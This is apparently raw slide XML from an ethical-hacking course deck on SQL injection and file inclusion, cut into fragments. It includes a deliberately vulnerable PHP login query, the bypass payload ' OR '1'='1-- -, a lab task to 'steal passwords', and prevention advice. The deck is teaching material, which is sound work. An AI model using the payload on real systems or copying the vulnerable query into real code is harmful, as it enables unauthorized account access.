              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OR '1'='1-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$conn</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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysqli_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$result</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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>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chemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Login successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="453B81"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Login failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193ED4F8-EB16-B9F8-3F62-610DF4F46F8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4443645" y="1583563"/>
            <a:ext cx="3837910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>What if we enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>1-- - ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DAAA13B-20A1-3FA2-00D6-E016B10D5DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050892" y="5686293"/>
            <a:ext cx="9882345" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OR '1'='1-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password='$password'";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073874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SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1123240"/>
            <a:ext cx="10920844" cy="2118529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OBJECTIVE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>STEP BY STEP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>github.com/eyesoul216</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298840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SQL INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1123240"/>
            <a:ext cx="10920844" cy="1287532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HOW TO PREVENT SQL INJECTION ATTACK:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input sanitization and validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use prepared statements.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="SQL injection humor - 9GAG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDD85FD-23C4-3797-99A0-ABED61C40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20" y="4202967"/>
            <a:ext cx="3962948" cy="2224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365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95905-1729-CEB0-82A2-AADCF9CC579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0746C63-0BB3-E7E4-1F9F-95FD89260012}"/>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5664BD1A-50FB-28CF-38A9-CE66D798A76C}"/>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HOW TO PREVENT SQL INJECTION ATTACK ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{247E9AE7-CE68-B347-960B-DA563B56FA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382547" y="1403265"/>
            <a:ext cx="11426906" cy="4970239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441250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D70813-A0D3-BD8E-BE7B-4E7521A6994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28DE677-2CC5-D274-9CE4-36859CA98C8D}"/>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8CCF6A25-E294-59B3-4FC7-3C471CBE0FD8}"/>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FILE INCLUSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93AE3A66-27C8-0E13-F2ED-472C50168D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1699794"/>
            <a:ext cx="10920844" cy="2534027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file inclusion attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a type of security vulnerability that occurs when an attacker can manipulate a web application to include a file from the server or an external source. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can lead to the execution of arbitrary code, exposing sensitive files, or even compromising the entire web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File inclusion vulnerabilities are primarily of two types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local File Inclusion (LFI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote File Inclusion (RFI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394953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Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC96783-1E6F-4F45-9BAF-6813B741F307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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FEF4DF0-D68B-E645-B133-CCF8A6A8B3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6953984" y="2756105"/>
            <a:ext cx="4775028" cy="1345790"/>
            <a:chOff x="6566433" y="2749602"/>
            <a:chExt cx="4919865" cy="1345790"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2900A0E2-4CF2-10FC-37EE-E9FCC8068A67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6665543" y="2749602"/>
              <a:ext cx="3051768" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Module 1</a:t>
